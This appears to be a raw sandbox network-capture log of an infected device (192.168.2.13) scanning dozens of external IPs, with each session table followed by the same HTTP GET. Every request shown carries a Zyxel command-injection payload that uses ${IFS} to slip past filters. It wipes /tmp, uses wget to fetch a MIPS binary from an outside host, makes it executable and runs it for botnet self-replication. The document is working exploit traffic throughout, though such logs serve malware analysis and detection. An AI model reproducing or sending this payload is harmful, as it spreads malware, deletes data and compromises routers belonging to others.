                              Mar 31, 2024 08:42:11.404624939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8656192.168.2.1344386193.99.134.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404666901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8657192.168.2.133737287.6.172.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404704094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8658192.168.2.1357440154.72.209.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404741049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8659192.168.2.1355242207.251.139.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404789925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8660192.168.2.1355728199.89.110.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404819965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8661192.168.2.1354748143.187.124.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404866934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8662192.168.2.135945474.61.220.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404892921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8663192.168.2.1347062204.127.127.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404939890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8664192.168.2.134525299.107.57.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404979944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8665192.168.2.134245482.13.219.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405026913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8666192.168.2.136058661.185.219.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405047894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8667192.168.2.1357328103.233.65.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405081987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8668192.168.2.1345714111.18.58.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405136108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8669192.168.2.135553887.103.82.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405172110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8670192.168.2.134449639.253.200.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405219078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8671192.168.2.1342904151.22.51.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405246973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8672192.168.2.1348862172.250.114.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405268908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8673192.168.2.135759840.239.11.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405328989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8674192.168.2.1359010210.186.155.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405350924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8675192.168.2.1339378202.143.104.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405400038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8676192.168.2.1344480203.138.149.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405421019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8677192.168.2.1343230157.238.120.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405472994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8678192.168.2.1358822206.244.174.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405508041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8679192.168.2.1352476221.174.181.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405545950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8680192.168.2.134797824.119.200.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405594110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8681192.168.2.1357546176.112.212.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405637980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8682192.168.2.1341712205.146.190.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405688047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8683192.168.2.1355106142.155.241.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405705929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8684192.168.2.133356224.32.21.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405756950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8685192.168.2.134180827.85.103.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405802011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8686192.168.2.133870479.60.149.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405838966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8687192.168.2.1356580152.197.177.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405868053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8688192.168.2.1352484203.4.5.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405911922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8689192.168.2.1342210203.180.39.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405936956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8690192.168.2.133327635.245.26.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.405960083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8691192.168.2.1358610179.156.113.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406013966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8692192.168.2.1344624149.100.92.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406059027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8693192.168.2.135428465.148.130.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406090975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8694192.168.2.1336050186.32.237.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406117916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8695192.168.2.1359322174.94.17.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406157970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8696192.168.2.1360164155.108.199.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406196117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8697192.168.2.13508648.39.76.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406245947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8698192.168.2.134780650.35.191.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406291008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8699192.168.2.1350706143.15.127.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406326056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8700192.168.2.134203292.136.18.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406356096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8701192.168.2.1350622188.6.212.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406409025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8702192.168.2.1348364113.127.32.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406447887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8703192.168.2.134468061.91.169.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406497002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8704192.168.2.1358668194.144.162.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406532049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8705192.168.2.1345564121.52.222.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406569958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8706192.168.2.1353300186.95.238.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406622887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8707192.168.2.1350374118.241.242.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406656027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8708192.168.2.1340732166.82.88.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406701088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8709192.168.2.1344052202.237.203.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406747103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8710192.168.2.133972639.18.95.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406776905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8711192.168.2.1360240135.75.195.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406806946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8712192.168.2.1349818118.252.186.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406835079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8713192.168.2.1351754108.165.248.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406876087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8714192.168.2.1338546112.243.0.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406920910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8715192.168.2.1354856118.47.120.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406949043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8716192.168.2.134161086.57.58.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.406958103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8717192.168.2.133764882.199.201.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407002926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8718192.168.2.1348810192.98.204.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407035112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8719192.168.2.134932080.220.7.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407058954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8720192.168.2.1338976185.95.22.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407094002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8721192.168.2.1356796150.215.2.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407147884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8722192.168.2.134715669.126.234.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407174110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8723192.168.2.135284625.83.172.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.407212973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8724192.168.2.135240813.132.208.174443
                              TimestampBytes transferredDirectionData
